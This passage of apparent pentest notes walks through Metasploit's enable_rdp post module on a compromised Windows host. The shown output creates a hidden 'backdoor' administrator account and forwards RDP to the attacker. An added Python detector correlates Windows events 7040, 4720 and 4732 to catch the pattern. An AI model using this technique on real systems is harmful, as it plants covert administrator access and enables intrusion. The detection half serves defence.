Requires an elevated shell

You can use the module post/windows/manage/enable_rdp to enable RDP on the victim computer automatically. This module also lets you:

  • forward the victim's port 3389 to the attacker machine
  • create a new user that belongs to the Remote Desktop Users group and NT AUTHORITY\SYSTEM

Example

msf6 > use post/windows/manage/enable_rdp
 
msf6 post(windows/manage/enable_rdp) > show options
 
Module options (post/windows/manage/enable_rdp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORWARD   true             no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to forward remote connection.
   PASSWORD  backdoor         no        Password for the user created.
   SESSION   70               yes       The session to run this module on
   USERNAME  backdoor         no        The username of the user to create.
 
 
View the full module info with the info, or info -d command.
 
msf6 post(windows/manage/enable_rdp) > exploit
 
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[+]     RDP Service Started
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: backdoor with Password: backdoor
[*]     Adding User: backdoor to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: backdoor to local group 'Administrators'
[*] You can now login with the created user
[*] Starting the port forwarding at local port 3389
[*] Forward TCP relay created: (local) 0.0.0.0:3389 -> (remote) 127.0.0.1:3389
[*] For cleanup execute Meterpreter resource file: /home/talion/.msf4/loot/20230127183750_default_192.168.0.12_host.windows.cle_596732.txt
[*] Post module execution completed
 

In this example I created a new user backdoor with password backdoor; it belongs to the Remote Desktop Users group and NT AUTHORITY\SYSTEM. I also forwarded port 3389 to my attacker machine, so now I can use the creds backdoor:backdoor to connect to 127.0.0.1:3389 with an RDP client like xfreerdp or remmina. But the victim will be prompted that they will be disconnected after 30 sec because somebody else is trying to connect.

Then I have access to the target desktop!
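From the defender's side, the module's output above is a compact list of host artifacts: a TermService start-type change, a new local account, and that account joining Remote Desktop Users and Administrators within seconds. The following detection logic is an added example (not part of the original notes or of Metasploit) that correlates those Windows event IDs (7040 in the System log, 4720 and 4732 in the Security log) over constructed sample events; the five-minute window and the flattened event field names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events, flattened from Windows System/Security log fields
# (field names are an assumption; real collectors name them differently).
EVENTS = [
    {"time": "2023-01-27T18:37:50", "id": 7040, "service": "TermService",
     "new_start": "auto start"},                       # SCM: start type changed
    {"time": "2023-01-27T18:37:51", "id": 4720, "target": "backdoor",
     "subject": "WIN10\\alice"},                       # user account created
    {"time": "2023-01-27T18:37:52", "id": 4732, "target": "backdoor",
     "group": "Remote Desktop Users"},                 # added to local group
    {"time": "2023-01-27T18:37:53", "id": 4732, "target": "backdoor",
     "group": "Administrators"},                       # added to local group
    {"time": "2023-01-27T09:00:00", "id": 4720, "target": "svc_backup",
     "subject": "WIN10\\admin"},                       # benign: no group adds
]

WINDOW = timedelta(minutes=5)  # assumed correlation window


def parse(ts):
    return datetime.fromisoformat(ts)


def find_rdp_backdoor_patterns(events, window=WINDOW):
    """Return one hit per account that was created (4720) and, within `window`,
    added (4732) to Remote Desktop Users; record whether it also became an
    Administrator and whether TermService's start type changed nearby (7040)."""
    hits = []
    for c in (e for e in events if e["id"] == 4720):
        t0 = parse(c["time"])
        groups = {e["group"] for e in events
                  if e["id"] == 4732 and e.get("target") == c["target"]
                  and t0 <= parse(e["time"]) <= t0 + window}
        termservice_changed = any(
            e["id"] == 7040 and e.get("service") == "TermService"
            and abs(parse(e["time"]) - t0) <= window for e in events)
        if "Remote Desktop Users" in groups:
            hits.append({"user": c["target"], "groups": sorted(groups),
                         "termservice_changed": termservice_changed,
                         "severity": "high" if "Administrators" in groups else "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_rdp_backdoor_patterns(EVENTS):
        print(hit)
```

The "Hiding user from Windows Login screen" step leaves a value under the Winlogon SpecialAccounts\UserList registry key rather than an event, so it is a host-state check (or a registry-audit event) to add separately.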